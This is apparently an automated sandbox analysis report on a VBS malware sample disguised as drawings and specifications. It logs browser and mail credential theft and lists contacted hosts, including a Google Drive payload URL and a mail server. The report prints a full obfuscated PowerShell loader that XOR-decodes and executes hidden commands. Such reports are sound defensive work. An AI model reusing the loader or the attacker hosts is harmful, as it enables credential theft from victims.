C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAwJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Konst02 { param([String]$Paatryknin201); $Fonetik134 = ''; Write-Host $Fonetik134; Write-Host $Fonetik134; Write-Host $Fonetik134; $Bdel222 = New-Object byte[] ($Paatryknin201.Length / 2); For($Spag=0; $Spag -lt $Paatryknin201.Length; $Spag+=2){ $Bdel222[$Spag/2] = [convert]::ToByte($Paatryknin201.Substring($Spag, 2), 16); $Bdel222[$Spag/2] = ($Bdel222[$Spag/2] -bxor 155); } [String][System.Text.Encoding]::ASCII.GetString($Bdel222);}$Demog0=Konst02 'C8E2E8EFFEF6B5FFF7F7';$Demog1=Konst02 'D6F2F8E9F4E8F4FDEFB5CCF2F5A8A9B5CEF5E8FAFDFED5FAEFF2EDFED6FEEFF3F4FFE8';$Demog2=Konst02 'DCFEEFCBE9F4F8DAFFFFE9FEE8E8';$Demog3=Konst02 'C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFD';$Demog4=Konst02 'E8EFE9F2F5FC';$Demog5=Konst02 'DCFEEFD6F4FFEEF7FED3FAF5FFF7FE';$Demog6=Konst02 'C9CFC8EBFEF8F2FAF7D5FAF6FEB7BBD3F2FFFED9E2C8F2FCB7BBCBEEF9F7F2F8';$Demog7=Konst02 'C9EEF5EFF2F6FEB7BBD6FAF5FAFCFEFF';$Demog8=Konst02 'C9FEFDF7FEF8EFFEFFDFFEF7FEFCFAEFFE';$Demog9=Konst02 'D2F5D6FEF6F4E9E2D6F4FFEEF7FE';$Elevatorfo0=Konst02 'D6E2DFFEF7FEFCFAEFFECFE2EBFE';$Elevatorfo1=Konst02 'D8F7FAE8E8B7BBCBEEF9F7F2F8B7BBC8FEFAF7FEFFB7BBDAF5E8F2D8F7FAE8E8B7BBDAEEEFF4D8F7FAE8E8';$Elevatorfo2=Konst02 'D2F5EDF4F0FE';$Elevatorfo3=Konst02 'CBEEF9F7F2F8B7BBD3F2FFFED9E2C8F2FCB7BBD5FEECC8F7F4EFB7BBCDF2E9EFEEFAF7';$Elevatorfo4=Konst02 'CDF2E9EFEEFAF7DAF7F7F4F8';$Elevatorfo5=Konst02 'F5EFFFF7F7';$Elevatorfo6=Konst02 'D5EFCBE9F4EFFEF8EFCDF2E9EFEEFAF7D6FEF6F4E9E2';$Elevatorfo7=Konst02 'D2DEC3';$Elevatorfo8=Konst02 'C7';$Vattppe=Konst02 'CEC8DEC9A8A9';$Deviledj=Konst02 'D8FAF7F7CCF2F5FFF4ECCBE9F4F8DA';function fkp {Param ($Kominternf, $Back) ;$Faggrupp0 =Konst02 'BFCDFAE9F6F9BBA6BBB3C0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DCFEEFDAE8E8FEF6F9F7F2FEE8B3B2BBE7BBCCF3FEE9FEB6D4F9F1FEF8EFBBE0BBBFC4B5DCF7F4F9FAF7DAE8E8FEF6F9F7E2D8FAF8F3FEBBB6DAF5FFBBBFC4B5D7F4F8FAEFF2F4F5B5C8EBF7F2EFB3BFDEF7FEEDFAEFF4E9FDF4A3B2C0B6AAC6B5DEEAEEFAF7E8B3BFDFFEF6F4FCABB2BBE6B2B5DCFEEFCFE2EBFEB3BFDFFEF6F4FCAAB2';&($Elevatorfo7) $Faggrupp0;$Faggrupp5 = Konst02 'BFDDF7FAFCFCFEF7BBA6BBBFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCA9B7BBC0CFE2EBFEC0C6C6BBDBB3BFDFFEF6F4FCA8B7BBBFDFFEF6F4FCAFB2B2';&($Elevatorfo7) $Faggrupp5;$Faggrupp1 = Konst02 'E9FEEFEEE9F5BBBFDDF7FAFCFCFEF7B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDC6B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDB3B3D5FEECB6D4F9F1FEF8EFBBD2F5EFCBEFE9B2B7BBB3BFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCAEB2B2B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3BFD0F4F6F2F5EFFEE9F5FDB2B2B2B2B7BBBFD9FAF8F0B2B2';&($Elevatorfo7) $Faggrupp1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicof,[Parameter(Position = 1)] [Type] $Medplanbli = [Void]);$FaggruJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts211
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		1
OS Credential Dumping		1
File and Directory Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts221
Scripting		Boot or Logon Initialization Scripts11
Process Injection		1
Deobfuscate/Decode Files or Information		11
Input Capture		114
System Information Discovery		Remote Desktop Protocol1
Data from Local System		Exfiltration Over Bluetooth11
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts21
Command and Scripting Interpreter		Logon Script (Windows)Logon Script (Windows)221
Scripting		Security Account Manager211
Security Software Discovery		SMB/Windows Admin Shares1
Email Collection		Automated Exfiltration1
Non-Standard Port		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
PowerShell		Logon Script (Mac)Logon Script (Mac)2
Obfuscated Files or Information		NTDS1
Process Discovery		Distributed Component Object Model11
Input Capture		Scheduled Transfer2
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets231
Virtualization/Sandbox Evasion		SSH1
Clipboard Data		Data Transfer Size Limits23
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Masquerading		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items231
Virtualization/Sandbox Evasion		DCSync2
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
Process Injection		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 12383 Sample: Drawings_and_specifications.vbs Startdate: 13/03/2023 Architecture: WINDOWS Score: 88 31 mail.primevisionuae.com 2->31 33 googlehosted.l.googleusercontent.com 2->33 35 5 other IPs or domains 2->35 43 Potential malicious VBS script found (suspicious strings) 2->43 45 May check the online IP address of the machine 2->45 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 47 Wscript starts Powershell (via cmd or directly) 9->47 49 Obfuscated command line found 9->49 51 Very long command line found 9->51 53 Uses ipconfig to lookup or modify the Windows network settings 9->53 12 powershell.exe 7 9->12         started        15 ipconfig.exe 1 9->15         started        17 cmd.exe 1 9->17         started        process6 signatures7 55 Very long command line found 12->55 19 powershell.exe 12->19         started        21 conhost.exe 12->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started        process8 process9 27 CasPol.exe 14 22 19->27         started        dnsIp10 37 api4.ipify.org 64.185.227.155, 443, 49809 WEBNXUS United States 27->37 39 mail.primevisionuae.com 95.172.86.31, 49816, 587 SINGLEHOP-LLCUS United Kingdom 27->39 41 2 other IPs or domains 27->41 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 27->57 59 Tries to steal Mail credentials (via file / registry access) 27->59 61 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 27->61 63 3 other signatures 27->63 signatures11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Drawings_and_specifications.vbs5%ReversingLabs
Drawings_and_specifications.vbs5%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
c-0001.c-msedge.net0%VirustotalBrowse
mail.primevisionuae.com0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api4.ipify.org
64.185.227.155
truefalse
    		high
    c-0001.c-msedge.net
    		13.107.4.50
    		truefalseunknown
    drive.google.com
    		142.250.184.206
    		truefalse
      		high
      googlehosted.l.googleusercontent.com
      		172.217.16.193
      		truefalse
        		high
        mail.primevisionuae.com
        		95.172.86.31
        		truefalseunknown
        api.ipify.org
        		unknown
        		unknownfalse
          		high
          doc-04-6g-docs.googleusercontent.com
          		unknown
          		unknownfalse
            		high
            doc-10-6g-docs.googleusercontent.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                https://doc-10-6g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnips76btsibg57lgmgj73ftidkn/1678713000000/13880735354025239062/*/1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa?e=download&uuid=92dd0e3d-baea-43aa-a822-2534961c9412false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://doc-10-6g-docs.googleusercontent.com/CasPol.exe, 0000000D.00000003.2154966880.0000000005A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore68powershell.exe, 00000007.00000002.2180770146.0000018B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2180770146.0000018B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://doc-10-6g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnipCasPol.exe, 0000000D.00000003.2150804833.0000000005A54000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000003.2154966880.0000000005A90000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          64.185.227.155
                          		api4.ipify.orgUnited States
                          		18450WEBNXUSfalse
                          142.250.184.206
                          		drive.google.comUnited States
                          		15169GOOGLEUSfalse
                          95.172.86.31
                          		mail.primevisionuae.comUnited Kingdom
                          		32475SINGLEHOP-LLCUSfalse
                          142.250.186.65
                          		unknownUnited States
                          		15169GOOGLEUSfalse

                          General Information

                          Joe Sandbox Version:37.0.0 Beryl
                          Analysis ID:12383
                          Start date and time:2023-03-13 14:07:55 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 48s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Number of analysed new started processes analysed:21
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:Drawings_and_specifications.vbs
                          Detection:MAL
                          Classification:mal88.troj.spyw.evad.winVBS@13/8@5/4
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 4
                          • Number of non-executed functions: 1
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, UsoClient.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.4.50, 67.27.159.254, 67.27.158.126, 67.27.157.126, 8.238.190.126, 67.27.158.254
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fg.download.windowsupdate.com.c.footprint.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target CasPol.exe, PID 1784 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 3588 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                          • api.ipify.org/
                          aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                          • api.ipify.org/
                          M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                          • api.ipify.org/
                          WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                          • api.ipify.org/?format=wef
                          XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                          • api.ipify.org/
                          xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                          • api.ipify.org/?format=wef
                          8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                          • api.ipify.org/?format=wef
                          fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                          • api.ipify.org/?format=wef
                          file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                          • api.ipify.org/?format=wef
                          48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                          • api.ipify.org/?format=qwd

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          api4.ipify.orgshipping_order.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.237.62.211
                          D1BKSFrWHa.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          Bank_Details_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 173.231.16.76
                          Purchase_Enquiry_List.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          CLkgHWl2wc.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 173.231.16.76
                          WyuukEn7Pe.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          payment_swift.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          Zaplata,jpg.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          cnIGEMvA62.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          FedEx_Invoice-XXXXX4210-02032023073135894221.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          MT103_Halkbank,pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          DHL_Original_Document..exeGet hashmaliciousAgentTeslaBrowse
                          • 104.237.62.211
                          factura.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 104.237.62.211
                          documents-PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          Para_Transferi_Bilgilendirmesi1.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          SOA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          SHIPPING_DOC.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          New_order#2_W43.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          SKT_200204635_payment.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.237.62.211

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WEBNXUSshipping_order.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          D1BKSFrWHa.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          Bank_Details_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 173.231.16.76
                          Purchase_Enquiry_List.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          CLkgHWl2wc.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 173.231.16.76
                          WyuukEn7Pe.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          payment_swift.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          Zaplata,jpg.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          cnIGEMvA62.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          FedEx_Invoice-XXXXX4210-02032023073135894221.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          MT103_Halkbank,pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          DHL_Original_Document..exeGet hashmaliciousAgentTeslaBrowse
                          • 104.237.62.211
                          factura.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 104.237.62.211
                          documents-PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          Para_Transferi_Bilgilendirmesi1.exeGet hashmaliciousAgentTeslaBrowse
                          • 173.231.16.76
                          SOA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 104.237.62.211
                          SHIPPING_DOC.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          New_order#2_W43.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          SKT_200204635_payment.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eshipping_order.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          D1BKSFrWHa.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          rPz4Wr6Ttnk1RRi5.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          Bank_Details_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          Purchase_Enquiry_List.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          CLkgHWl2wc.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          WyuukEn7Pe.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          payment_swift.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          QUOTATION_220377FIBA00541_PDF.scr.exeGet hashmaliciousAveMariaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          Zaplata,jpg.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          cnIGEMvA62.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          Gea_Order.vbsGet hashmaliciousFormBookBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          FedEx_Invoice-XXXXX4210-02032023073135894221.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          MT103_Halkbank,pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          TNT_EXPRESS_CONSIGNMENT.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          DHL_Original_Document..exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          factura.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          chiygf.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          documents-PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          • 64.185.227.155
                          • 142.250.184.206
                          INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                          • 64.185.227.155
                          • 142.250.184.206

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                          Download File
                          Process:C:\Windows\System32\wscript.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
